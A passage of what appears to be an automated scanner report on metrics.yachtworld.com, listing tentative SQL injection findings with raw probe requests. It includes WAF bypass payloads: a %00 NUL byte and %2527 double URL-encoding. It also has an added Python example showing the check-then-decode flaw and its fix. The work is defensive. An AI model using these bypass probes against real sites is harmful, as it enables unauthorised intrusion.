The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/deyachtworld%00'/1/H.17/s42079387209378?AQB=1&ndh=1&t=27/0/2011%2013%3A25%3A11%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/southpaw/&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&c23=Thursday&c24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/southpaw/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.7.10.1296155835; s_sess=%20s_sq%3D%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296156311019%7C1298748311019%3B%20s_lv%3D1296156311021%7C1390764311021%3B%20s_lv_s%3DFirst%2520Visit%7C1296158111021%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:31:16 GMT
Server: Omniture DC/2.0.0
Content-Length: 417
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/deyachtworld was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/deyachtworld%00''/1/H.17/s42079387209378?AQB=1&ndh=1&t=27/0/2011%2013%3A25%3A11%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/southpaw/&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&c23=Thursday&c24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/southpaw/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.7.10.1296155835; s_sess=%20s_sq%3D%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296156311019%7C1298748311019%3B%20s_lv%3D1296156311021%7C1390764311021%3B%20s_lv_s%3DFirst%2520Visit%7C1296158111021%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:31:17 GMT
Server: Omniture DC/2.0.0
xserver: www260
Content-Length: 0
Content-Type: text/html


1.3. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s43482092181220 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.yachtworld.com
Path:   /b/ss/deyachtworld/1/H.17/s43482092181220

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As with 1.1 and 1.2, both responses recorded below are HTTP 404s from the Omniture collection server (a generic Not Found page with a failed ErrorDocument lookup, then an empty 404 body); the difference is in how the server reports a missing path, not in any database error, so this needs manual confirmation.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
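The %2527 double-URL-encoding bypass reported here and the %00 NUL-byte bypass reported in 1.1 and 1.2 come down to the same ordering mistake: the input is checked before it has reached the form the application finally uses. The following added example (not part of the original report, and not the target application's or its WAF's code) models that ordering in Python and shows the corrected order, canonicalise fully and then validate. The blocklist, the allowlist rule and the sample path-segment values are assumptions for illustration.

```python
import re
from urllib.parse import unquote

# Assumed blocklist a filter in front of the application might apply, and the allowlist
# a REST path segment such as "s43482092181220" should satisfy (both are assumptions).
BLOCKED = ("'", '"', ";", "--")
SEGMENT_OK = re.compile(r"[A-Za-z0-9._-]+")


def native_style_filter(value):
    """A check written in native code sees a NUL-terminated string: everything after the
    first \\x00 is invisible to it. Returns True when the visible part is allowed."""
    visible = value.split("\x00", 1)[0]
    return not any(token in visible for token in BLOCKED)


def check_then_decode_again(raw_segment):
    """The broken ordering both bypasses exploit: the web server decodes the path once,
    the filter runs on that, and application code then URL-decodes a second time.
    Returns the value the application ends up using, or None if the filter rejected it."""
    once = unquote(raw_segment)          # the single decode the web server performs
    if not native_style_filter(once):
        return None
    return unquote(once)                 # the application's own, second decode


def canonicalise_then_validate(raw_segment):
    """Fixed ordering: decode until the value stops changing, refuse control bytes, and
    only then validate the final form against an allowlist.
    Returns the canonical value, or None if it is rejected."""
    value = raw_segment
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    else:
        return None                      # still changing after three layers: refuse it
    if "\x00" in value:
        return None                      # NUL never belongs in a path segment
    if not SEGMENT_OK.fullmatch(value):
        return None
    return value


def contains_blocked(value):
    """Did a blocked token reach the application?"""
    return value is not None and any(token in value for token in BLOCKED)


if __name__ == "__main__":
    for raw in ("s43482092181220", "H.17%27", "H.17%2527", "H.17%00%27"):
        print(raw, "->", check_then_decode_again(raw), canonicalise_then_validate(raw))
```

With the broken ordering, a plain %27 is caught, but %2527 is still "%27" when the filter looks at it and only becomes a quote on the second decode, and %00%27 hides the quote behind a NUL that a native-code check treats as end of string. Decoding to a fixed point, refusing NUL and validating the result against an allowlist closes both paths in one place.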

Request 1

GET /b%2527/ss/deyachtworld/1/H.17/s43482092181220?AQB=1&ndh=1&t=27/0/2011%2013%3A20%3A34%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Boat_Details_US&g=http%3A//www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States&cc=USD&ch=Boats&server=ywapp05&events=event11%2Cevent2&c1=Boat%20Details&h1=Boats%7CAdvanced%20Search&v3=Boat_Details_US&c22=2%3A15PM&c23=Thursday&c24=Weekday&c27=www.yachtworld.com&v28=www.yachtworld.com&c32=2262662&v32=2262662&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296156034601%7C1298748034601%3B%20s_lv%3D1296156034602%7C1390764034602%3B%20s_lv_s%3DFirst%2520Visit%7C1296157834602%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:31:51 GMT
Server: Omniture DC/2.0.0
Content-Length: 443
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/deyachtworld/1/H.17/s43482092181220 was not
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/deyachtworld/1/H.17/s43482092181220?AQB=1&ndh=1&t=27/0/2011%2013%3A20%3A34%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Boat_Details_US&g=http%3A//www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States&cc=USD&ch=Boats&server=ywapp05&events=event11%2Cevent2&c1=Boat%20Details&h1=Boats%7CAdvanced%20Search&v3=Boat_Details_US&c22=2%3A15PM&c23=Thursday&c24=Weekday&c27=www.yachtworld.com&v28=www.yachtworld.com&c32=2262662&v32=2262662&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296156034601%7C1298748034601%3B%20s_lv%3D1296156034602%7C1390764034602%3B%20s_lv_s%3DFirst%2520Visit%7C1296157834602%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:31:51 GMT
Server: Omniture DC/2.0.0
xserver: www614
Content-Length: 0
Content-Type: text/html


1.4. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s43772089285776 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.yachtworld.com
Path:   /b/ss/deyachtworld/1/H.17/s43772089285776

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/deyachtworld/1/H.17/s43772089285776?AQB=1&ndh=1&t=27/0/2011%2013%3A24%3A8%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=searchResults_US&g=http%3A//www.yachtworld.com/core/listing/cache/searchResults.jsp%3Fcit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dhomepage%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26cur&r=http%3A//www.yachtworld.com/core/listing/advancedSearch.jsp%3FNtk%3DboatsEN%26searchtype%3Dhomepage%26fromYear%3D2004%26sm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26toLength%3D32%26fromLength%3D24%26fromPrice%3D0%26man%3Dregulator%26slim%3Dquick%26is%3Dfalse%26pricderange%3DSelect%2BPrice%2BRange&cc=USD&ch=Search&server=ywapp04&events=event2%2Cevent1&c1=Search%20Results&h1=Boats%7CAdvanced%20Search&v3=searchResults_US&c4=no%20search%20phrase%20entered&v4=no%20search%20phrase%20entered&c5=regulator&v5=regulator&c6=used&v6=used&c7=no%20search%20phrase%20entered&v7=no%20search%20phrase%20entered&c8=24%27-32%27&v8=24%27-32%27&c9=%3E2004&v9=%3E2004&c10=no%20search%20phrase%20entered&v10=no%20search%20phrase%20entered&c11=no%20search%20phrase%20entered&v11=no%20search%20phrase%20entered&c12=no%20search%20phrase%20entered&v12=no%20search%20phrase%20entered&c13=no%20search%20phrase%20entered&v13=no%20search%20phrase%20entered&c14=no%20search%20phrase%20entered&v14=no%20search%20phrase%20entered&c15=no%20search%20phrase%20entered&v15=no%20search%20phrase%20entered&c16=no%20search%20phrase%20entered&v16=no%20search%20phrase%20entered&c17=united%20states&v17=united%20states&c18=no%20search%20phrase%20entered&v18=no%20search%20phrase%20entered&c19=74&c20=Homepage&c21=Default&c22=2%3A15PM&c23=Thursday&c24=Weekday&c27=www.yachtworld.com&v27=Homepage&v28=www.yachtworld.com&v31=Default&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p
=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pid=advancedSearch_US&pidt=1&oid=Search&oidt=3&ot=SUBMIT&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=&rid=&cint=100&pbsint=&boatsAddedSelected=-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_pers=%20s_nr%3D1296156248340%7C1298748248340%3B%20s_lv%3D1296156248342%7C1390764248342%3B%20s_lv_s%3DFirst%2520Visit%7C1296158048342%3B; s_sess=%20s_sq%3Ddeyachtworld%253D%252526pid%25253DadvancedSearch_US%252526pidt%25253D1%252526oid%25253DSearch%252526oidt%25253D3%252526ot%25253DSUBMIT%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:37:26 GMT
Server: Omniture DC/2.0.0
Content-Length: 441
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/deyachtworld/1/H.17/s43772089285776 was not fo
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/deyachtworld/1/H.17/s43772089285776?AQB=1&ndh=1&t=27/0/2011%2013%3A24%3A8%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=searchResults_US&g=http%3A//www.yachtworld.com/core/listing/cache/searchResults.jsp%3Fcit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dhomepage%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26cur&r=http%3A//www.yachtworld.com/core/listing/advancedSearch.jsp%3FNtk%3DboatsEN%26searchtype%3Dhomepage%26fromYear%3D2004%26sm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26toLength%3D32%26fromLength%3D24%26fromPrice%3D0%26man%3Dregulator%26slim%3Dquick%26is%3Dfalse%26pricderange%3DSelect%2BPrice%2BRange&cc=USD&ch=Search&server=ywapp04&events=event2%2Cevent1&c1=Search%20Results&h1=Boats%7CAdvanced%20Search&v3=searchResults_US&c4=no%20search%20phrase%20entered&v4=no%20search%20phrase%20entered&c5=regulator&v5=regulator&c6=used&v6=used&c7=no%20search%20phrase%20entered&v7=no%20search%20phrase%20entered&c8=24%27-32%27&v8=24%27-32%27&c9=%3E2004&v9=%3E2004&c10=no%20search%20phrase%20entered&v10=no%20search%20phrase%20entered&c11=no%20search%20phrase%20entered&v11=no%20search%20phrase%20entered&c12=no%20search%20phrase%20entered&v12=no%20search%20phrase%20entered&c13=no%20search%20phrase%20entered&v13=no%20search%20phrase%20entered&c14=no%20search%20phrase%20entered&v14=no%20search%20phrase%20entered&c15=no%20search%20phrase%20entered&v15=no%20search%20phrase%20entered&c16=no%20search%20phrase%20entered&v16=no%20search%20phrase%20entered&c17=united%20states&v17=united%20states&c18=no%20search%20phrase%20entered&v18=no%20search%20phrase%20entered&c19=74&c20=Homepage&c21=Default&c22=2%3A15PM&c23=Thursday&c24=Weekday&c27=www.yachtworld.com&v27=Homepage&v28=www.yachtworld.com&v31=Default&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&
p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pid=advancedSearch_US&pidt=1&oid=Search&oidt=3&ot=SUBMIT&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=&rid=&cint=100&pbsint=&boatsAddedSelected=-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_pers=%20s_nr%3D1296156248340%7C1298748248340%3B%20s_lv%3D1296156248342%7C1390764248342%3B%20s_lv_s%3DFirst%2520Visit%7C1296158048342%3B; s_sess=%20s_sq%3Ddeyachtworld%253D%252526pid%25253DadvancedSearch_US%252526pidt%25253D1%252526oid%25253DSearch%252526oidt%25253D3%252526ot%25253DSUBMIT%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:37:26 GMT
Server: Omniture DC/2.0.0
xserver: www632
Content-Length: 0
Content-Type: text/html


1.5. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.yachtworld.com
Path:   /b/ss/deyachtworld/1/H.17/s48372025459539

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/deyachtworld/1/H.17/s48372025459539?AQB=1&pccr=true&vidn=26A0E25385162B05-600001A6003F61D3&&ndh=1&t=27/0/2011%2013%3A17%3A16%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/core/listing/cache/pl_search_results.jsp%3Fywo%3Dstarlingmarine%26ps%3D50%26type%3D%26new%3D%26luom%3D126%26hosturl%3Dstarlingmarine%26page%3Dbroker%26slim%3Dbroker%26lineonly&r=http%3A//www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&v22=2%3A15PM&c23=Thursday&v23=Thursday&c24=Weekday&v24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=713&bh=1200&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp?ywo=starlingmarine&ps=50&type=&new=&luom=126&hosturl=starlingmarine&page=broker&slim=broker&lineonly
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
